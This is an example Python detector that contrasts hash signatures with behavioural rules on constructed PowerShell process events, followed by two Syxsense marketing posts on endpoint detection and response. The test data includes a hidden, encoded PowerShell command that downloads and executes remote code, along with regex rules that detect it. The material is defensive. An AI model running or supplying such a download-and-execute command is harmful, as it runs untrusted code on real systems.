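"""Signature check versus behavioural rules on constructed process events.

Added example for this page, not Syxsense code. Events are constructed
Sysmon-style process-creation records; the indicator hash is invented.
"""
import base64
import re
from typing import Optional

# Assumed indicator for the example: not a real malware hash.
KNOWN_BAD_SHA256 = {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"}


def _encode_for_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events. sha256 is None where no new executable
# was written to disk: only an existing, trusted binary ran.
EVENTS = [
    {"pid": 4411, "parent": "explorer.exe", "image": r"C:\Tools\dropper.exe",
     "cmdline": "dropper.exe",
     "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"},
    {"pid": 5120, "parent": "WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + _encode_for_powershell(
                    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')"),
     "sha256": None},
    {"pid": 6001, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1", "sha256": None},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def signature_verdict(event) -> Optional[str]:
    """What a hash-only scanner sees: a hit only if a known file hash is present."""
    return "known-bad-hash" if event["sha256"] in KNOWN_BAD_SHA256 else None


def behaviour_verdicts(event) -> list:
    """What a behavioural rule set sees, whether or not a file exists."""
    hits = []
    parent = event["parent"].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append(f"office-app-spawned-{image}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded-command")
    script = decoded if decoded is not None else cmdline
    if (re.search(r"\b(iex|invoke-expression)\b", script, re.I)
            and re.search(r"downloadstring|downloadfile|invoke-webrequest", script, re.I)):
        hits.append("download-and-execute")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
        hits.append("hidden-window")
    return hits


def triage(events) -> list:
    """Run both detectors over every event and return the verdicts side by side."""
    return [{"pid": e["pid"], "signature": signature_verdict(e),
             "behaviour": behaviour_verdicts(e)} for e in events]


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```

The third event, a scheduled backup script launched from Explorer, trips none of the rules, which is the reason behavioural detection combines several signals rather than alerting on PowerShell alone: encoded commands and hidden windows are used by legitimate management tooling, but an Office application spawning a hidden, encoded PowerShell that downloads and executes remote code is a chain with almost no benign explanation.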


Moving Ahead to Endpoint Protection

Back in 2015, in a guest blog post for Politico, engineer and futurist David Evans estimated that about 127 new endpoints were being added to the internet of things every second, all over the world. More recently, Gartner projected that IoT growth had reached the point at which there would be approximately 5.8 billion endpoints in the global enterprise and automotive markets alone by the end of 2020, marking 21% growth from the previous year.

According to the SANS study “Understanding the (True) Cost of Endpoint Management,” 61% of the respondents said their organizations had more than 1,000 user endpoints, while 5% claimed to have 100,000 or more. And the risk to small businesses is no less real and significant than that facing medium-sized and enterprise-level companies. Per Verizon’s Mobile Security Index 2019, 88% of firms with 500 or fewer workers acknowledged that endpoint security was a serious hazard to their operations, and that it will only get worse.

EDR to the Rescue

EDR solutions emerged as a means of addressing the security issues created by the increase in endpoints, IoT-related or not. They are typically delivered as software-as-a-service, with a lightweight agent on each endpoint. Rather than only scanning the network and its interconnected devices for known malware signatures, EDR tools record and monitor process, file, network and user activity, looking for actions and operations that are out of the ordinary. This is sometimes referred to as “suspicious activity validation.”

The best EDR tools perform all of the classic functions of their cybersecurity predecessors, but leverage new methods to do so, including the use of artificial intelligence and machine learning. Furthermore, they are not limited to checking for conventional signatures to look for signs of potential malware intrusions; they also examine URLs, IP addresses, file hashes, and other data points.

How EDR from Syxsense Keeps You Protected

Cyber-attackers are not exactly the kind of folks who will limit their intrusions to business hours. Whatever they are up to—from monetary gain to state-sponsored intrusion—bad actors are always on the lookout for weak spots to take advantage of. IoT endpoints are among their favorites. Your organization deserves an EDR solution that is as constantly active—and aggressive—as cybercriminals are.

Syxsense Secure and Manage both provide enterprise users with the sort of always-on protection that is necessary to mitigate the broad spectrum of cybersecurity threats out there today. By allowing for comprehensive and real-time visibility into all endpoint activity, reporting on device inventory, quickly quarantining detected threats, and automatically patching all of your devices—be they Windows, Mac, or Linux—Syxsense solutions represent an efficient and meticulous approach to information-security needs.


Why Endpoint Detection and Response is Getting Harder in 2020


As the severity of cyberthreats increases, the demand for endpoint detection and response solutions across the globe is growing.

The demand for endpoint detection and response solutions across the globe is currently quite strong, with no signs of slowdown any time soon: Recent research by London-based firm Technavio predicts that the market for this type of cybersecurity software will grow by $7.67 billion between 2020 and 2024, representing a compound annual growth rate of 10%.

Why such robust growth in this space? The answer is both simple and unfortunately discomforting. It’s becoming more difficult for businesses, government departments and other organizations to feel secure with the endpoint protections they have in place.

No wonder, given that the severity (and sheer number) of cyberthreats out there is constantly growing. Today, we’ll take a look at what challenges organizations aiming to bolster the effectiveness of their information security may face — and how they might be able to overcome such hurdles.

More Devices = More Potential Weaknesses

Analysis from the researchers at Gartner projected in August 2019 that there would be 5.8 billion internet of things endpoints in the enterprise and automotive markets around the world by the end of the following year: a 21% uptick from 2019's number.

There’s no denying the utility and communicability that the IoT fosters for so many, but while marveling at those positive attributes you must also note the risks it poses. As the number of endpoints increases across your network — both inside and outside of the IoT realm — so do the potential points of weakness.

In fact, Infosecurity magazine reported in October 2019 that there had been more than 100 million attacks on IoT-connected devices in the first half of that year. Applications run on such devices can be particularly vulnerable.

According to TechRadar, facing up to the security threat represented by IoT device proliferation requires use of an endpoint security solution that can offer comprehensive visibility of all internal and external vulnerabilities. This vigilance must be constant and in real time.

Mounting Danger of New and Established Cyberthreats

IoT-focused cyberattacks, while relatively new in the cyberthreat landscape, have already done plenty of damage, with Wired citing the Mirai and Reaper botnets of 2016 and 2017, respectively, as major examples of such malicious campaigns. The latter of those infected more than 1 million networks. New threats coming through IoT endpoints will have the ability to be even more devastating, manifesting as large, complex distributed denial of service (DDoS) attacks.

Other attack styles that are even more well-established, like phishing, are becoming more dangerous in similar ways, according to Security Boulevard. Malicious actors have diversified their capabilities so that these social engineering scams are no longer confined to emails that are relatively easy to detect: they can be delivered via text messages (smishing) and even phone calls (vishing). AI plays a significant role here, as attackers use it to mimic an organization's in-house jargon and speech and thus make phishing expeditions harder to spot.

Last but not least, ransomware looks to pose a graver threat than ever before. The extortionists using this malware saw plenty of success in 2018 and 2019, attacking local governments across the U.S., including Atlanta, Baltimore and New Orleans.

In one particularly brazen, widespread attack, hackers simultaneously hit the municipal networks of 22 Texas cities and towns, disabling countless web-based civic services and operations.

Although not all of those attacks netted hackers the ransom sums they demanded, the disturbing effectiveness of such efforts has likely emboldened cyber attackers, so bigger and more devastating ransomware campaigns are surely on the horizon for 2020. The same is almost certainly true for IoT-based and social engineering attacks. Only the strongest, most versatile threat detection and solutions will be capable of meeting major cyberthreats head-on, be they new attack types or updated versions of old standbys.

The Need for Quicker Responses to Threats

Opinions vary on how long it takes attackers to breach a target once they've picked it. Some say it falls between 10 and 15 hours, while others consider it more a matter of minutes, according to TechTarget. Either way, that's an effectively minuscule time frame.

In an interview with Dark Reading, Dan Basile, executive director of security operations at Texas A&M University, noted that while it's ideal to find cyberthreats before they can do any harm, like removing a tumor before cancer metastasizes, this perfect-world plan of action isn't always possible. The focus then switches to quickly directing infosec defenses at a detected threat before permanent damage occurs. EDR needs to be part of a quick-response strategy, along with application firewalls, network traffic analysis and other systems.

EDR Can’t Do It Alone

That last sentence in the section above represents another key point: EDR is (and will continue to be) more difficult if you expect it to carry the weight of all infosec responsibilities on its own. It must be deployed in concert with firewalls, encryption, multi-factor authentication, threat hunting and other tools. The support of an organizational culture aware of and focused on the gravity of contemporary cybersecurity threats is also essential.

Choosing Syxsense as your EDR solution gives your business a considerable head start on the journey to a reliably secure environment for your digital assets. Coupled with our comprehensive managed IT and patch management services, Syxsense can provide your organization the peace of mind it deserves. Contact us today to learn more or sign up for a free trial.
